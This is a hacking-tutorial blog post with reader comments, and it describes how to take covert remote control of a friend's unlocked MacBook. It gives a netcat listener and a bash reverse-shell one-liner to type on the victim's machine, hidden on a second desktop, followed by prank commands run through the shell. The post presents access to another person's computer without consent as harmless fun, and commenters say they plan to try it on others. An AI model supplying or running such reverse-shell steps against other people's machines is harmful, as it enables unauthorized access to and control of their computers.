Real Scenarios #1: The New MacBook

The New MacBook

You're at your friend's house. All you've heard about all day is his new laptop. He's got a brand new top-specced MacBook Pro, and he won't stop going on about it. It particularly annoys you as all you've got is a 4 year old cheap laptop, even if it is running Linux.

If only there was some way to make him stop gloating!

Your goal is to be able to remotely control his computer, then whilst he's on it get it to do something that will shut him up.

How?

Image via Shutterstock

Unfortunately, OSX is a pretty secure OS, so there's not too much you can do in the way of quick exploits to run.

Whilst you're pondering this conundrum, your friend leaves the room to get a drink, and he's left his new laptop unlocked! This is your chance!

Step 1: What Do I Do??!

You probably have 120 seconds before he gets back, what can you do in that time to get remote control his computer?

Step 2: Find Your IP

You flip up the screen of your laptop, launch a terminal in Kali and type ifconfig.

You note your IP, 192.168.1.88, then turn to his computer.

Step 3: Set Up a Listener

What you want is a shell on his computer, through a TCP connection to yours, and you need to set it up in the least time possible!

Type the following to listen for a connection on port 1234 (you can use whichever you like as long as it's not being used by something else)

nc -l -p 1234

Step 4: Connection

First, you create a new desktop on his mac as you don't want him to see what you've done.

Then, you open a terminal and type the following:

bash -i >& /dev/tcp/192.168.1.88/1234 0>&1

This creates a TCP connection to 192.168.1.88 (your IP), on port 1234, and sends bash through it, in effect creating a reverse shell.

You also turn his volume up, for something you have planned later....

You put down his laptop just as he re enters the room.
Now you have a shell on his system!

Step 5: Imagination

You've achieved your goal! You now have remote access to his computer!

What now?

Well, first let's just annoy him and puzzle him by repeatedly opening safari.

We type

open -a safari

which gets sent through our TCP connection and opens safari on his screen.

We do this a few times and can visibly see him getting annoyed. Oh the joy :)

Image via Shutterstock

Step 6: Crank Up the Prank

Now let's have some fun by getting his computer to say things; on OSX there's a say command, which speaks text out loud, so let your imagination run wild as to what you get it to say.

In this case, let's just make him believe he's got an error by typing the following:

say "Segmentation fault. Please return to vendor"

Oh, the look on his face.

You've had your fun, so you wind it up by saying the following in a Zarvox voice (because why the heck not):

say -v "Zarvox" "You are an idiot. Your friend, however, is awesome."

Step 7: Run.

Hope you enjoyed :)

8 Comments

Love the idea of these tuts. I'll be driving the Mrs a little crazy with this one lol

Nice one ! But.. shouldn't step 3 and 4 be inverted ? I mean.. you first open a listener on your pc (nc -l -p 1234), then connect from the macbook. Not sure how macs handle connection, but any win/linux will try to connect just once, then fail if port is closed, and quit. Does your command issue a persistent connection attempt (if fail, then retry ?)

Yeah i was wondering too, because you're kali is supposed to be listening for the connection then you can execute the shell on the mac

You're completely right; I've switched them round. I've been playing with bind and reverse shells so absent mindedly confused the order!

Easy and clear, effettive and demonstrative. Good way to start a series.

Nice tutorial, I'm thinking of trying it.

Nice one :D So, how can we do this to a linux or windows pc ?
MacOS: bash -i >& /dev/tcp/192.168.1.88/1234 0>&1
Windows: ???
Linux: ???

Share Your Thoughts

  • Hot
  • Latest